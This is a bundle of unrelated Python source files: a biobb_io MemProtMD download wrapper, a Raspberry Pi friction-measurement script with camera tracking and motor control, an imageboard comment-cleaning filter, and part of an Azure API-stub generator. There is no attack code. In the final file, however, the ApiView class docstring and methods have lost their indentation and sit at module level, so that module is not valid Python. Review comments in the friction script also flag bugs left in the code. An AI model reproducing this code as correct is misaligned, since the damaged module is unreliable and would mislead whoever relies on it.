        output_simulation (str): Path to the output simulation in a ZIP file. File type: output. `Sample file <https://github.com/bioexcel/biobb_io/raw/master/biobb_io/test/reference/api/output_sim.zip>`_. Accepted formats: zip (edam:format_3987).
        properties (dic - Python dictionary object containing the tool parameters, not input/output files):
            * **pdb_code** (*str*) - (None) RSCB PDB code.
            * **remove_tmp** (*bool*) - (True) [WF property] Remove temporal files.
            * **restart** (*bool*) - (False) [WF property] Do not execute if output files exist.

    Examples:
        This is a use example of how to use the building block from Python::

            from biobb_io.api.memprotmd_sim import memprotmd_sim
            prop = {
                'pdb_code': '2VGB'
            }
            memprotmd_sim(output_simulation='/path/to/newSimulation.zip',
                          properties=prop)

    Info:
        * wrapped_software:
            * name: MemProtMD DB
            * license: Creative Commons
        * ontology:
            * name: EDAM
            * schema: http://edamontology.org/EDAM.owl
    """

    def __init__(self, output_simulation,
                 properties=None, **kwargs) -> None:
        properties = properties or {}

        # Call parent class constructor
        super().__init__(properties)

        # Input/Output files
        self.io_dict = {
            "out": { "output_simulation": output_simulation }
        }

        # Properties specific for BB
        self.pdb_code = properties.get('pdb_code', None)
        self.properties = properties

        # Check the properties
        self.check_properties(properties)

    def check_data_params(self, out_log, err_log):
        """ Checks all the input/output paths and parameters """
        self.output_simulation = check_output_path(self.io_dict["out"]["output_simulation"], "output_simulation", False, out_log, self.__class__.__name__)

    @launchlogger
    def launch(self) -> int:
        """Execute the :class:`MemProtMDSim <api.memprotmd_sim.MemProtMDSim>` api.memprotmd_sim.MemProtMDSim object."""

        # check input/output paths and parameters
        self.check_data_params(self.out_log, self.err_log)

        # Setup Biobb
        if self.check_restart(): return 0
        self.stage_files()

        check_mandatory_property(self.pdb_code, 'pdb_code', self.out_log, self.__class__.__name__)

        # get simulation files and save to output
        # NOTE(review): the returned JSON string is currently unused --
        # get_memprotmd_sim writes the output file as a side effect.
        json_string = get_memprotmd_sim(self.pdb_code, self.output_simulation, self.out_log, self.global_log)

        return 0
def memprotmd_sim(output_simulation: str, properties: dict = None, **kwargs) -> int:
    """Execute the :class:`MemProtMDSim <api.memprotmd_sim.MemProtMDSim>` class and
    execute the :meth:`launch() <api.memprotmd_sim.MemProtMDSim.launch>` method."""
    building_block = MemProtMDSim(output_simulation=output_simulation,
                                  properties=properties, **kwargs)
    return building_block.launch()
def main():
    """Command line execution of this building block. Please check the command line documentation."""
    parser = argparse.ArgumentParser(description="Wrapper for the MemProtMD DB REST API (http://memprotmd.bioch.ox.ac.uk/) to download a simulation.", formatter_class=lambda prog: argparse.RawTextHelpFormatter(prog, width=99999))
    parser.add_argument('-c', '--config', required=False, help="This file can be a YAML file, JSON file or JSON string")

    # Specific args of each building block
    required_args = parser.add_argument_group('required arguments')
    required_args.add_argument('-o', '--output_simulation', required=True, help="Path to the output simulation in a ZIP file. Accepted formats: zip.")

    args = parser.parse_args()
    # Properties come from the optional config file/string (YAML/JSON).
    config = args.config if args.config else None
    properties = settings.ConfReader(config=config).get_prop_dic()

    # Specific call of each building block
    memprotmd_sim(output_simulation=args.output_simulation,
                  properties=properties)
# Allow execution as a standalone script.
if __name__ == '__main__':
    main()
|
<filename>Codes/main.py<gh_stars>0
from threading import Thread
from imutils.video import VideoStream
import cv2
import time
import imutils
import math
import argparse
import matplotlib.pyplot as plt
import numpy as np
# CLI: a single positional argument selects which friction coefficient to
# measure; the value is validated later in Vision.arrange_screen.
parser = argparse.ArgumentParser(
    description='This program calculates either the static or kinetic friction coefficient between two surfaces.')
parser.add_argument('mode', type=str, default=None,
                    help='Chose mode. The mode can either be "static" or "kinetic"')
args = parser.parse_args()
mode = args.mode  # "static" or "kinetic"
class Vision(Thread):
    """Camera thread: tracks a user-selected object on the inclined surface,
    overlays live measurements and computes the friction coefficient
    according to the global `mode` ("static" or "kinetic")."""

    def __init__(self, system):
        super().__init__()
        # Resolution matches the pixel coordinates hard-coded in arrange_screen.
        self.camera = VideoStream(usePiCamera=True, resolution=(688, 528)).start()
        time.sleep(0.5)  # give the camera time to warm up
        self.tracker = cv2.TrackerMOSSE_create()
        self.isTracking = None
        self.initBB = None
        self.frame = None
        self.initial_target_object_center = None
        self.initial_time = time.time()
        self.moving = False            # object moved in the last frame
        self.motion_detected = False   # object has moved at least once
        self.speed = 0                 # pixels per second
        self.system = system           # InclinedSurface hardware thread
        self.is_running = True
        self.framesToShow = dict()
        self.isWindowShowEnabled = False
        self.key = "empty"
        self.coefficient_of_static_friction = 0.0
        self.coefficient_of_kinetic_friction = 0.0

    def run(self):
        # Main capture loop: grab a frame, update the tracker, draw overlays.
        while self.is_running:
            frame = self.camera.read()
            # Object tracking
            if self.isTracking:
                (success, box) = self.tracker.update(frame)
                if success:
                    (x, y, w, h) = [int(v) for v in box]
                    frame = cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
                    final_target_object_center = (x + w / 2, y + h / 2)
                    self.speed = self.get_speed(final_target_object_center)
                    # Motion threshold scales with the frame area (pixels/s).
                    if self.speed > frame.shape[0] * frame.shape[1] / 100000:
                        self.motion_detected = True
                        self.system.start_recording()
                        self.moving = True
                    else:
                        self.moving = False
            # Arrange the screen
            frame = self.arrange_screen(frame)
            self.showFrame(frame)
        self.isWindowShowEnabled = False
        plt.close()

    # Arrange the general screen
    def arrange_screen(self, frame):
        # General Screen
        frame = cv2.rectangle(frame, (0, 490), (688, 528), (0, 0, 0), -1)
        frame = cv2.rectangle(frame, (510, 0), (688, 30), (0, 0, 0), -1)
        frame = cv2.putText(frame, "Angle:" + str(round(self.system.pot_angle, 1)), (10, 517), cv2.FONT_HERSHEY_SIMPLEX,
                            1, (0, 0, 200), 2, cv2.LINE_AA)
        frame = cv2.putText(frame, "Distance:" + str(round(self.system.sonar, 2)), (520, 20), cv2.FONT_HERSHEY_SIMPLEX,
                            0.7, (0, 0, 200), 2, cv2.LINE_AA)
        # Custom Screen Settings
        if mode == "static":
            frame = self.arrange_screen_static(frame)
        elif mode == "kinetic":
            frame = self.arrange_screen_kinetic(frame)
        else:
            raise Exception("Wrong mode selected. Please Specify the mode as either 'static' or 'kinetic'")
        return frame

    # Specialize arrange_screen for static friction calculations
    def arrange_screen_static(self, frame):
        if self.moving:
            frame = cv2.putText(frame, "Moved!", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 200), 2, cv2.LINE_AA)
            # mu_s = tan(theta) at the moment the object starts sliding.
            self.coefficient_of_static_friction = round(math.tan(math.pi * self.system.pot_angle / 180.0), 2)
        if self.motion_detected:
            frame = cv2.putText(frame, "coefficient of static friction:" + str(self.coefficient_of_static_friction),
                                (300, 517), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 200), 1, cv2.LINE_AA)
        return frame

    # Specialize arrange_screen for kinetic friction calculations
    def arrange_screen_kinetic(self, frame):
        if self.motion_detected:
            frame = cv2.putText(frame, "Started Measuring!", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 200), 2,
                                cv2.LINE_AA)
            frame = cv2.putText(frame, "Press the button to stop measuring", (50, 100), cv2.FONT_HERSHEY_SIMPLEX, 1.0,
                                (0, 0, 200), 2, cv2.LINE_AA)
            if self.moving:
                # Hold the incline steady while the object slides.
                self.system.set_motor_speed(0)
            # End reading data
            if self.system.button_state and len(self.system.recorded_data) > 10:
                # Stop mechanism
                self.system.set_motor_speed(0)
                self.motion_detected = False
                # Process the recorded data
                data = self.system.end_recording_data()
                x = list()
                y = list()
                for i in data:
                    x.append(i["time_stamp"])
                    y.append(i["distance"] / 100.0)  # cm -> m
                p = plotter()
                position_v_time = [x, y]
                position_v_time = p.trim_data(position_v_time)
                p.plot("Position", position_v_time)
                # Fit position, then differentiate for velocity and acceleration.
                position_v_time_eq = p.plot_equation("Position", position_v_time)
                velocity_v_time_eq = p.take_derivative(position_v_time_eq)
                acceleration_v_time_eq = p.take_derivative(velocity_v_time_eq)
                _ = p.plot_equation("Velocity", position_v_time, eq=velocity_v_time_eq)
                _ = p.plot_equation("Acceleration", position_v_time, eq=acceleration_v_time_eq)
                print("\n\n*********************")
                print("Position vs. Time Graph's Equation is:")
                print(position_v_time_eq)
                print("\n*********************")
                print("Velocity vs. Time Graph's Equation is:", velocity_v_time_eq)
                print("*********************")
                print("Acceleration vs. Time Graph's Equation is:", acceleration_v_time_eq, "\n", "*********************")
                # mu_k = tan(theta) - a / (g * cos(theta))
                # NOTE(review): stored in a variable named "static" although it
                # is the kinetic coefficient -- confirm naming.
                coefficient_of_static_friction = round(math.tan(math.pi * self.system.pot_angle / 180.0), 2) - float(acceleration_v_time_eq.c[0]) / (9.81 * round(math.cos(math.pi * self.system.pot_angle / 180.0), 2))
                print("Therefore the coefficient of kinetic friction is:{}".format(coefficient_of_static_friction))
                p.show()
        return frame

    # Multi-threaded window showing function
    def showFrame(self, frameToShow, windowName="Frame"):
        self.framesToShow[windowName] = frameToShow
        if not self.isWindowShowEnabled:
            self.isWindowShowEnabled = True
            Thread(target=self.__updateWindowFrame__, args=()).start()

    # Thread for updating the frame
    def __updateWindowFrame__(self):
        while self.isWindowShowEnabled:
            for name in self.framesToShow.copy():
                cv2.imshow(name, self.framesToShow[name])
                self.key = cv2.waitKey(30)
                # "s": select a ROI and start tracking it.
                if self.key == ord("s"):
                    initBB = cv2.selectROI("Frame", self.framesToShow["Frame"], fromCenter=False, showCrosshair=True)
                    self.tracker.init(self.framesToShow["Frame"], initBB)
                    self.isTracking = True
                # "r": reset tracker and recorded data.
                if self.key == ord('r'):
                    self.motion_detected = False
                    self.tracker = cv2.TrackerMOSSE_create()
                    self.isTracking = False
                    self.system.enabled_recording = False
                    self.system.recorded_data = list()
        cv2.destroyAllWindows()

    # Calculate the velocity(pixel/seconds) of the selected object
    def get_speed(self, target_center):
        elapsed = time.time() - self.initial_time
        if self.initial_target_object_center is None:
            self.initial_target_object_center = target_center
            speed = 0
        else:
            displacement = ((target_center[0] - self.initial_target_object_center[0]) ** 2 +
                            (target_center[1] - self.initial_target_object_center[1]) ** 2) ** 0.5
            speed = displacement / elapsed
        self.initial_time = time.time()
        self.initial_target_object_center = target_center
        return speed
class plotter:
    """Three stacked matplotlib axes (position/velocity/acceleration vs time)
    plus helpers to fit/differentiate a position polynomial."""

    def __init__(self):
        self.fig, (ax1, ax2, ax3) = plt.subplots(3, 1, figsize=(7, 8))
        plt.subplots_adjust(top=0.95, bottom=0.05)
        ax1.set_title("Position v. Time")
        ax1.set_xlabel("Time(s)")
        ax1.set_xlim(left=0.0)
        ax1.set_ylabel("Position(m)")
        ax1.set_ylim(bottom=0.0)
        ax1.grid(True)
        ax1.autoscale(True)
        ax2.set_title("Velocity v. Time")
        ax2.set_xlabel("Time(s)")
        ax2.set_xlim(left=0.0)
        ax2.set_ylabel("Velocity(m/s)")
        ax2.set_ylim(bottom=0.0)
        ax2.grid(True)
        ax2.autoscale(True)
        ax3.set_title("Acceleration v. Time")
        ax3.set_xlabel("Time(s)")
        ax3.set_xlim(left=0.0)
        ax3.set_ylabel("Acceleration(m/s^2)")
        ax3.set_ylim(bottom=0.0)
        ax3.grid(True)
        ax3.autoscale(True)
        # Axis lookup by graph name, used by plot()/plot_equation().
        self.ax = {
            "Position": ax1,
            "Velocity": ax2,
            "Acceleration": ax3
        }

    def take_derivative(self, eq):
        """Differentiate a 1st- or 2nd-degree numpy poly1d."""
        # second degree polynomial
        # NOTE(review): both accepted branches call eq.deriv() identically;
        # only the degree validation differs from a single call.
        if len(eq.c) == 3:
            new_eq = eq.deriv()
        elif len(eq.c) == 2:
            new_eq = eq.deriv()
        else:
            raise Exception("Your equation must be either of 1st or 2nd degree")
        return new_eq

    def trim_data(self, data):
        """Zero both series against the mean of their first 10 samples, then
        keep only positions strictly between 0.03 m and 0.35 m."""
        x = data[0]
        y = data[1]
        new_x = list()
        new_y = list()
        for t in range(0, len(y)):
            x[t] = x[t] - (x[0] + x[1] + x[2] + x[3] + x[4] + x[5] + x[6] + x[7] + x[8] + x[9])/10.0
            y[t] = y[t] - (y[0] + y[1] + y[2] + y[3] + y[4] + y[5] + y[6] + y[7] + y[8] + y[9])/10.0
        for t, pos in enumerate(y):
            if pos < 0.35 and pos > 0.03:
                new_x.append(x[t])
                new_y.append(pos)
        return [new_x, new_y]

    def plot(self, graph_of, plot_data):
        """Scatter-plot raw (x, y) samples on the named axis."""
        self.ax[graph_of].plot(plot_data[0], plot_data[1], **{"marker": "o"})

    def plot_equation(self, graph_of, data_lists, eq=None):
        """Fit (Position) or reuse (Velocity/Acceleration) a polynomial,
        draw it over the data, and return the poly1d."""
        x = data_lists[0]
        y = data_lists[1]
        # NOTE(review): np.linspace's third argument (sample count) is given
        # as `y[-1] + 10`, a float position value -- looks like it should be
        # an integer count such as `len(y) + 10`; confirm intent.
        t = np.linspace(0, x[-1] + 0.1, y[-1] + 10)
        if graph_of == "Position":
            p_pos = np.poly1d(np.polyfit(x, y, 2))
        elif graph_of == "Velocity" or graph_of == "Acceleration":
            p_pos = eq
        else:
            raise Exception("You can only plot Position, Velocity or Acceleration")
        self.ax[graph_of].plot(x, y, 'o', t, p_pos(t), '-')
        return p_pos

    def show(self):
        """Display all three figures (blocking)."""
        plt.show()
from RpiMotorLib import rpi_dc_lib
from RPi import GPIO
class InclinedSurface(Thread):
    """Hardware thread: reads angle/sonar/button from an Arduino over serial,
    drives the tilt motor, and records timestamped measurements."""

    def __init__(self):
        super().__init__()
        # L298N dual H-bridge motor driver on GPIO 19/13/26, 50 Hz PWM.
        self.motor = rpi_dc_lib.L298NMDc(19, 13, 26, 50)
        self.pot_angle = 0.0         # incline angle from the potentiometer (deg)
        self.sonar = 0               # last valid sonar distance (cm)
        self.button_state = False
        self.is_running = True
        self.recorded_data = list()  # measurement dicts appended while recording
        self.enabled_recording = False
        self.percent = 0             # signed motor duty cycle (-100..100)

    def run(self):
        import serial  # Import Serial Library
        arduinoSerialData = serial.Serial('/dev/ttyS0', 57600)  # Create Serial port object called arduinoSerialData
        while self.is_running:
            try:
                # Line format: "<pot>,<sonar>,<button>\r\n"
                my_data = arduinoSerialData.readline()
                str_my_data = str(my_data, encoding="utf-8").split("\r\n")[0]
                list_my_data = str_my_data.split(",")
                pot = int(list_my_data[0])
                # Linear calibration from raw potentiometer value to degrees.
                self.pot_angle = -0.257 * pot + 219.0
                sonar = float(list_my_data[1])
                # Discard out-of-range sonar readings (>= 40 cm).
                self.sonar = sonar if sonar < 40 else self.sonar
                self.button_state = int(list_my_data[2])
                if self.enabled_recording:
                    measurement = {"angle": self.pot_angle,
                                   "distance": self.sonar,
                                   "time_stamp": time.time()}
                    self.recorded_data.append(measurement)
                # Sign of `percent` selects the motor direction.
                if self.percent > 0:
                    self.motor.backward(self.percent)
                elif self.percent < 0:
                    self.motor.forward(-self.percent)
                else:
                    self.motor.stop(0)
                # Safety stop outside the mechanical range.
                if not (-7 < self.pot_angle < 60):
                    self.percent = 0
            except:
                # NOTE(review): bare except silently drops malformed serial
                # lines (and any other error) to keep the loop alive.
                pass

    def start_recording(self):
        self.enabled_recording = True

    def end_recording_data(self):
        """Stop recording and rebase all timestamps to the first sample."""
        self.enabled_recording = False
        initial_time = self.recorded_data[0]["time_stamp"]
        for index in range(len(self.recorded_data)):
            self.recorded_data[index]["time_stamp"] = self.recorded_data[index]["time_stamp"] - initial_time
        return self.recorded_data

    def set_motor_speed(self, percent):
        self.percent = percent

    def get_to_starting_point(self):
        """Drive the incline back to 0 degrees, then stop the motor."""
        if self.pot_angle > 0:
            while self.pot_angle > 0:
                self.set_motor_speed(-50)
                time.sleep(0.01)
        else:
            while self.pot_angle < 0:
                self.set_motor_speed(50)
                time.sleep(0.01)
        self.set_motor_speed(0)
        print("\n************\n")
        print("The Mechanism has been set to its default position. Ready to set motor speed")
        print("\n************\n")
# Start the hardware and vision threads, home the incline, then accept motor
# commands from stdin until Ctrl-C.
system = InclinedSurface()
system.start()
vis = Vision(system)
vis.start()
system.get_to_starting_point()
while True:
    try:
        val = input("Set Motor:")
        try:
            if val == "default":
                # Re-home the mechanism.
                system.get_to_starting_point()
            else:
                system.set_motor_speed(int(val))
        except:
            print("\nOnly decimal numbers allowed!\n")
    except KeyboardInterrupt:
        # Graceful shutdown: stop both threads and the motor before exiting.
        print("\nexiting\n")
        system.is_running = False
        vis.is_running = False
        system.set_motor_speed(0)
        time.sleep(0.5)
        exit()
|
<gh_stars>10-100
import re
def filter_data(comment):
    """Clean a comment: strip roll/URL noise from each line and drop lines
    rejected by any module-level `skip_line_*` predicate."""
    lines = comment.split('\n')
    # Collect the names of all module-level "skip_line_*" predicates; each one
    # receives a lowercased line and returns True when the line must go.
    line_filters = list(filter(
        lambda name: name.startswith('skip_line_'),
        [k for k, v in globals().items()]
    ))
    # Iterate backwards so pops do not shift indices of unvisited lines.
    for i in range(len(lines) - 1, -1, -1):
        line = lines[i] + ''
        # Also strips the hangul-filler padding characters sometimes used
        # as invisible whitespace.
        line = line.strip(' ᅠᅠᅠ ')
        line = cut_by_regex(line, '^((ре)?-?ролл)[.,] ')
        line = cut_by_regex(line, '^((re)?-?roll)[.,] ')
        line = cut_by_regex(line, '[.,] ((ре)?-?ролл)[.,]?$')
        line = cut_by_regex(line, '[.,] ((re)?-?roll)[.,]?$')
        line = cut_by_regex(line, '(: )?https?://[a-z0-9#?=%&@\-_.:/)!]+$')
        line = cut_by_regex(line, 'https?://[a-zа-яё0-9#?=%&@\-_.:/()\[\]!,]+$')
        line = cut_by_regex(line, 'https?://[a-zа-яё0-9#?=%&@\-_.:/()\[\]!,]+ ')
        line = line.strip()
        if line != lines[i]:
            # Replace the original line with its cleaned version in place.
            lines.pop(i)
            lines.insert(i, line)
        for lf in line_filters:
            if globals()[lf](line.lower()):
                lines.pop(i)
                break
        # NOTE(review): if a filter already popped index i AND the cleaned line
        # is empty, this pops a second line; currently no filter matches empty
        # strings, so the case cannot occur -- confirm before changing filters.
        if len(line) == 0:
            lines.pop(i)
    return '\n'.join(lines)
def cut_by_regex(line, regex):
    """Strip every occurrence of `regex` from `line` (unicode-aware,
    case-insensitive); return the line unchanged when there is no match."""
    flags = re.U | re.I
    if re.search(regex, line, flags=flags):
        return re.sub(regex, '', line, flags=flags)
    return line
def skip_line_short(line):
    """Drop lines that are exactly one character long."""
    return len(line) == 1
def skip_line_quote(line):
    """Drop quoted ("greentext") lines."""
    return line[:1] == '>'
def skip_line_url(line):
    """Drop lines that are bare URLs."""
    return line.startswith(('http://', 'https://'))
def skip_line_exclude(line):
    """Drop lines that are (almost) nothing but a roll/bump/test/sage keyword,
    allowing up to 16 extra characters around the keyword."""
    words_to_exclude = [
        'bump', 'bamp', 'бамп', 'бумп', 'бапм', 'побампа',
        'ролл', 'роллллллл', 'roll', 'rollllll', 'реролл', 'reroll', 'roлл',
        'rолл', 'ллор', 'llor', 'hjkk', 'кщдд', 'кручу-верчу', 'кручу', 'рiлл',
        'рольчик', 'ролол', 'r0ll', 'rell', 'рольнём', 'рольнем', 'рролл',
        'r o l l', 'р о л л', 'poll', 'ro11', 'ро11',
        'test', 'тест',
        'sage', 'сажа',
        'source', 'соус', 'совас'
    ]
    if line in words_to_exclude:
        return True
    for word in words_to_exclude:
        # Only lines not much longer than the keyword itself can match.
        if len(line) - len(word) > 16:
            continue
        at_start = re.fullmatch('[^a-zа-яё0-9]*' + word + '.*?', line, re.U)
        at_end = re.fullmatch('.*?' + word + '[^a-zа-яё0-9]*', line, re.U)
        if at_start or at_end:
            return True
    return False
def skip_line_nonmean(line):
    """Drop lines that begin with a known boilerplate/navigation prefix."""
    boilerplate_prefixes = (
        'сажа сажа сажа сажа',
        'sage sage sage sage',
        '[назад]',
        'тематика [au',
        'тематика [au',
        'главная настройка mobile',
        'доски каталог ст',
        '[ b / vg / po / n',
        '[ответить в тред]',
        'image.',
        '[жирный] [наклонный] [цитирование',
        'кликни/брось файл/',
        'покупка пасскода позволяет обходить капчу. ',
        'перекот ',
        'перекат треда ',
        'xdddddddddd',
        '11010000 10011011 11010000 10111110 11010000 10111011 100000 110',
        'голова, дай денег',
        'голова дай денег',
        'голова, дай же мне денег',
        'пирамида дай денег',
    )
    # str.startswith accepts a tuple of prefixes, so one call covers them all.
    return line.startswith(boilerplate_prefixes)
|
<gh_stars>0
from json import JSONEncoder
import logging
import re
import importlib
import inspect
import platform
from ._node_index import NodeIndex
from ._token import Token
from ._token_kind import TokenKind
from ._version import VERSION
from ._diagnostic import Diagnostic
from ._metadata_map import MetadataMap
JSON_FIELDS = ["Name", "Version", "VersionString", "Navigation", "Tokens", "Diagnostics", "PackageName", "Language"]
# Banner emitted at the top of every generated API stub.
HEADER_TEXT = "# Package is parsed using api-stub-generator(version:{0}), Python version: {1}".format(VERSION, platform.python_version())
# Matches a (possibly "~"-prefixed) dotted type name, e.g. "~azure.core.Foo".
# Raw string fixes the invalid "\d" escape (SyntaxWarning on Python 3.12+).
TYPE_NAME_REGEX = re.compile(r"(~?[a-zA-Z\d._]+)")
TYPE_OR_SEPERATOR = " or "
# Lint warnings
SOURCE_LINK_NOT_AVAILABLE = "Source definition link is not available for [{0}]. Please check and ensure type is fully qualified name in docstring"
class ApiView:
"""Entity class that holds API view for all namespaces within a package
:param str pkg_name: The package name.
:param str namespace: The package namespace.
:param MetadataMap metadata_map: A metadata mapping object.
"""
def __init__(self, *, pkg_name="", namespace = "", metadata_map=None):
    # Package identity and review metadata.
    self.name = pkg_name
    self.version = 0
    self.version_string = ""
    self.language = "Python"
    self.tokens = []       # flat token stream rendered by the API view
    self.navigation = []   # navigation tree entries
    self.diagnostics = []  # lint diagnostics attached to lines
    self.indent = 0        # current group nesting level (4 spaces per level)
    self.namespace = namespace
    self.node_index = NodeIndex()
    self.package_name = pkg_name
    self.metadata_map = metadata_map or MetadataMap("")
    # Header banner is excluded from diffing via SkipDiffRange markers.
    self.add_token(Token("", TokenKind.SkipDiffRangeStart))
    self.add_literal(HEADER_TEXT)
    self.add_token(Token("", TokenKind.SkipDiffRangeEnd))
    self.set_blank_lines(2)
def add_token(self, token):
    """Append a single token to the view's token stream."""
    self.tokens.append(token)
def begin_group(self, group_name=""):
    """Begin a new group in API view by shifting to right.

    `group_name` is currently unused; only the indent level changes.
    """
    self.indent += 1
def end_group(self):
"""End current group by moving indent to left
"""
if not self.indent:
raise ValueError("Invalid intendation")
self.indent -= 1
def add_whitespace(self):
    """Emit the current indentation (4 spaces per level) if inside a group."""
    if self.indent:
        self.add_token(Token(" " * (self.indent * 4)))
def add_space(self):
    """Emit a single whitespace token."""
    self.add_token(Token(" ", TokenKind.Whitespace))
def add_newline(self):
    """ Used to END a line and wrap to the next.
        Cannot be used to inject blank lines -- see `set_blank_lines`.
    """
    # No-op when the stream already ends with a newline token.
    if self.tokens[-1].kind == TokenKind.Newline:
        return
    self.add_token(Token("", TokenKind.Newline))
def set_blank_lines(self, count):
    """ Ensures a specific number of blank lines.
        Adds or removes trailing newline tokens so that exactly `count`
        blank lines terminate the token stream.
    """
    # Count the trailing Newline tokens already present.
    trailing = 0
    for tok in reversed(self.tokens):
        if tok.kind != TokenKind.Newline:
            break
        trailing += 1
    # N blank lines require N + 1 newline tokens (one ends the last line).
    target = count + 1
    if trailing < target:
        for _ in range(target - trailing):
            self.add_token(Token("", TokenKind.Newline))
    else:
        for _ in range(trailing - target):
            self.tokens.pop()
def add_punctuation(self, value, prefix_space=False, postfix_space=False):
    """Emit a punctuation token, optionally padded with spaces on either side."""
    if prefix_space:
        self.add_space()
    self.add_token(Token(value, TokenKind.Punctuation))
    if postfix_space:
        self.add_space()
def add_line_marker(self, text):
    """Emit an invisible LineIdMarker token whose definition id is `text`."""
    token = Token("", TokenKind.LineIdMarker)
    token.definition_id = text
    self.add_token(token)
def add_text(self, id, text, add_cross_language_id=False):
    """Emit a plain text token carrying definition id `id`; optionally attach
    the cross-language definition id from the metadata map."""
    token = Token(text, TokenKind.Text)
    token.definition_id = id
    if add_cross_language_id:
        token.cross_language_definition_id = self.metadata_map.cross_language_map.get(id, None)
    self.add_token(token)
def add_keyword(self, keyword, prefix_space=False, postfix_space=False):
    """Emit a keyword token, optionally padded with space tokens."""
    if prefix_space:
        self.add_space()
    keyword_token = Token(keyword, TokenKind.Keyword)
    self.add_token(keyword_token)
    if postfix_space:
        self.add_space()
def add_type(self, type_name, line_id=None):
    """Tokenize a type annotation string.

    Strips Sphinx ``:class:`` markup and, when several types are joined
    with the 'or' separator, re-encodes them as a single ``Union[...]``
    before generating tokens.
    """
    if not type_name:
        return
    type_name = type_name.replace(":class:", "")
    logging.debug("Processing type {}".format(type_name))
    # Encode multiple 'or'-separated types into a Union
    if TYPE_OR_SEPERATOR in type_name:
        # str.split never yields the separator itself, so the original
        # filter `t != TYPE_OR_SEPERATOR` was dead code and is dropped.
        types = [t.strip() for t in type_name.split(TYPE_OR_SEPERATOR)]
        type_name = "Union[{}]".format(", ".join(types))
    self._add_type_token(type_name, line_id)
def _add_token_for_type_name(self, type_name, line_id=None):
    """Emit a TypeName token for a single type, linking it when possible.

    Internal types (prefixed "~") that cannot be resolved to a node id
    and are not importable produce a missing-source-link diagnostic.
    """
    logging.debug("Generating tokens for type name {}".format(type_name))
    is_internal = type_name.startswith("~")
    # Drop the docstring "~" prefix to get the importable full name.
    full_name = type_name[1:] if is_internal else type_name
    token = Token(type_name, TokenKind.TypeName)
    token.value = full_name.split(".")[-1]
    target_id = self.node_index.get_id(full_name)
    if target_id:
        token.navigate_to_id = target_id
    elif is_internal and line_id:
        # If the name is not importable it is likely wrong in the
        # docstring; a source link also won't exist for types from a
        # different package.
        if not is_valid_type_name(full_name):
            self.add_diagnostic(SOURCE_LINK_NOT_AVAILABLE.format(token.value), line_id)
    self.add_token(token)
def _add_type_token(self, type_name, line_id=None):
    """Recursively tokenize a (possibly generic) type string.

    Splits ``type_name`` into punctuation prefix, one parsed type name,
    and a postfix that is processed recursively until only group-closing
    punctuation remains.
    """
    logging.debug("Generating tokens for type {}".format(type_name))
    found = re.search(TYPE_NAME_REGEX, type_name)
    if not found:
        # Only group-ending punctuation (e.g. "]") remains.
        self.add_punctuation(type_name)
        return
    parsed_type = found.groups()[0]
    index = type_name.find(parsed_type)
    prefix = type_name[:index]
    if prefix:
        self.add_punctuation(prefix)
    # BUG FIX: line_id was threaded through the recursion but dropped at
    # this call, so diagnostics for invalid internal type names nested
    # inside generics were never reported.
    self._add_token_for_type_name(parsed_type, line_id)
    postfix = type_name[index + len(parsed_type):]
    self._add_type_token(postfix, line_id)
def add_diagnostic(self, text, line_id):
    """Record a diagnostic message attached to the given line id."""
    diagnostic = Diagnostic(line_id, text)
    self.diagnostics.append(diagnostic)
def add_member(self, name, id):
    """Emit a member-name token with the given definition id."""
    member_token = Token(name, TokenKind.MemberName)
    member_token.definition_id = id
    self.add_token(member_token)
def add_stringliteral(self, value):
    """Emit ``value`` wrapped in double quotes as a string-literal token."""
    quoted = "\u0022{}\u0022".format(value)
    self.add_token(Token(quoted, TokenKind.StringLiteral))
def add_literal(self, value):
    """Emit a literal (e.g. numeric or boolean) token."""
    literal_token = Token(value, TokenKind.Literal)
    self.add_token(literal_token)
def add_navigation(self, navigation):
    """Append a navigation entry to the API view's navigation tree."""
    self.navigation.append(navigation)
class APIViewEncoder(JSONEncoder):
    """Encoder to generate JSON for an ApiView object.

    Model objects are converted to dicts with PascalCase keys; unset
    optional properties are removed to reduce payload size.
    """

    def _snake_to_pascal(self, text: str) -> str:
        """Convert snake_case to PascalCase, e.g. "definition_id" -> "DefinitionId"."""
        return text.replace("_", " ").title().replace(" ", "")

    def _pascal_to_snake(self, text: str) -> str:
        """Convert PascalCase to snake_case, e.g. "DefinitionId" -> "definition_id"."""
        results = "_".join([x.lower() for x in re.findall('[A-Z][^A-Z]*', text)])
        return results

    def default(self, obj):
        """Serialize APIView model objects; fall back to JSONEncoder for others."""
        obj_dict = {}
        if isinstance(obj, (ApiView, Token, Navigation, NavigationTag, Diagnostic)):
            if isinstance(obj, ApiView):
                # Only emit the whitelisted fields for the top-level view.
                for key in JSON_FIELDS:
                    snake_key = self._pascal_to_snake(key)
                    if snake_key in obj.__dict__:
                        obj_dict[key] = obj.__dict__[snake_key]
            elif isinstance(obj, Token):
                obj_dict = {self._snake_to_pascal(k): v for k, v in obj.__dict__.items()}
                # Remove unset optional properties to reduce size
                if not obj.definition_id:
                    del obj_dict["DefinitionId"]
                if not obj.navigate_to_id:
                    del obj_dict["NavigateToId"]
                if not obj.cross_language_definition_id:
                    del obj_dict["CrossLanguageDefinitionId"]
            elif isinstance(obj, Diagnostic):
                obj_dict = {self._snake_to_pascal(k): v for k, v in obj.__dict__.items()}
                if not obj.help_link_uri:
                    del obj_dict["HelpLinkUri"]
            else:
                obj_dict = {self._snake_to_pascal(k): v for k, v in obj.__dict__.items()}
            return obj_dict
        elif isinstance(obj, (TokenKind, Kind)):
            # Enum-like values serialize as their raw value.
            return obj.value
        else:
            try:
                # BUG FIX: the original discarded this return value; also
                # narrowed the bare `except:` to the TypeError that
                # JSONEncoder.default raises for unknown types.
                return JSONEncoder.default(self, obj)
            except TypeError:
                logging.error(
                    "Failed to serialize using default serialization for {}. "
                    "Serializing using object dict.".format(obj))
                return obj_dict
class NavigationTag:
    """Tag attached to a navigation item describing the kind of its target."""

    def __init__(self, kind):
        self.type_kind = kind
class Kind:
    """Kind vocabulary used by the APIView tool for navigation tags."""
    type_class = "class"
    type_enum = "enum"
    type_method = "method"
    # Python modules are presented as namespaces in the tool.
    type_module = "namespace"
    # Python packages are presented as assemblies in the tool.
    type_package = "assembly"
class Navigation:
    """Navigation model written into the tokens file.

    A list of Navigation objects represents the tree panel shown in the
    APIView tool; each node may carry child nodes and an optional tag.
    """

    def __init__(self, text, nav_id):
        self.text = text
